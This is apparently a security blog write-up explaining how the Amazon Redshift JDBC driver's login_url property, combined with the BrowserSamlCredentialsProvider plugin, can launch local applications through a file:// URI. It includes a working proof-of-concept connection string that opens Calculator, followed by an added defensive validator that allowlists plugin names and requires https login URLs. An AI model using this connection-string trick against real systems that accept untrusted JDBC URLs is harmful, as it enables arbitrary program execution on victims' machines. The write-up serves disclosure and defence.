Amazon Redshift JDBC Attack Trick

Amazon Redshift JDBC Driver supports plenty of properties as well.

However, two properties are special: plugin_name and login_url. The plugin_name property is used for providing IAM credentials. The Amazon Redshift JDBC driver includes SAML-based credential provider plugins. One of them is for SAML MFA: the plugin class named com.amazon.redshift.plugin.BrowserSamlCredentialsProvider.


So set a breakpoint at the openBrowser() method of the BrowserSamlCredentialsProvider class.


As the debugger shows, the value of the login_url property is passed to the method Desktop.getDesktop().browse().

As we know, the method Desktop.getDesktop().browse() from the java.awt package launches the default browser to display a URI.


Consequently, it is enough to set file:///System/Applications/Calculator.app as the value of the login_url property, and the default browser will display it. Here is the PoC:

import java.sql.DriverManager;
import java.sql.SQLException;

public class RedshiftDemo {
    public static void main(String[] args) throws SQLException {

        // Print the driver version under test.
        System.out.println("Amazon Redshift Driver Version: " + com.amazon.redshift.jdbc42.Driver.class.getPackage().getSpecificationVersion());

        DriverManager.registerDriver(new com.amazon.redshift.jdbc42.Driver());

        // plugin_name selects BrowserSamlCredentialsProvider; its openBrowser() passes
        // login_url to Desktop.getDesktop().browse(), here with a file:// URI.
        DriverManager.getConnection("jdbc:redshift:iam://mycluster:us-west-2/dev?plugin_name=com.amazon.redshift.plugin.BrowserSamlCredentialsProvider&login_url=file:///System/Applications/Calculator.app");
    }
}
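
The following is an added example, not code from the original post or from the Redshift driver: a check an application can run on an untrusted Redshift JDBC URL before handing it to DriverManager, rejecting any login_url that is not an https URL and any plugin_name outside an allowlist. The class name RedshiftUrlGuard, the allowlist contents, the handling of `?`, `&` and `;` as separators, the case-insensitive name matching and the idp.example.com URL are assumptions.

```java
import java.net.URI;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Locale;
import java.util.Set;

public class RedshiftUrlGuard {
    // Assumption: the only credential-provider plugin this application needs.
    static final Set<String> ALLOWED_PLUGINS =
            Set.of("com.amazon.redshift.plugin.BrowserSamlCredentialsProvider");
    /** Returns null when the URL is acceptable, otherwise the reason for rejecting it. */
    static String reject(String jdbcUrl) {
        String[] parts = jdbcUrl.split("[?;]", 2);
        if (parts.length < 2) return null; // no properties in the URL
        for (String pair : parts[1].split("[&;]")) {
            int eq = pair.indexOf('=');
            if (eq < 0) continue;
            // Case-insensitive names and decoded values, so odd casing or %-encoding cannot bypass.
            String key = pair.substring(0, eq).trim().toLowerCase(Locale.ROOT);
            try {
                String value = URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8).trim();
                if (key.equals("plugin_name") && !ALLOWED_PLUGINS.contains(value)) {
                    return "plugin_name not in allowlist: " + value;
                }
                if (key.equals("login_url")) {
                    URI uri = URI.create(value);
                    if (!"https".equalsIgnoreCase(uri.getScheme()) || uri.getHost() == null) {
                        return "login_url must be an https URL with a host: " + value;
                    }
                }
            } catch (IllegalArgumentException e) {
                return "malformed value for " + key;
            }
        }
        return null;
    }

    public static void main(String[] args) {
        String base = "jdbc:redshift:iam://mycluster:us-west-2/dev?plugin_name="
                + "com.amazon.redshift.plugin.BrowserSamlCredentialsProvider&login_url=";
        String[] constructed = { // constructed inputs; idp.example.com is a placeholder
            base + "file:///System/Applications/Calculator.app",
            base + "https://idp.example.com/sso" };
        for (String url : constructed) {
            String reason = reject(url);
            System.out.println((reason == null ? "ALLOW" : "REJECT: " + reason) + " <- " + url);
        }
    }
}
```

The same check belongs on values supplied through a java.util.Properties object, since connection properties can be passed to DriverManager.getConnection() that way as well as in the URL.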


Make JDBC Attacks Brilliant Again!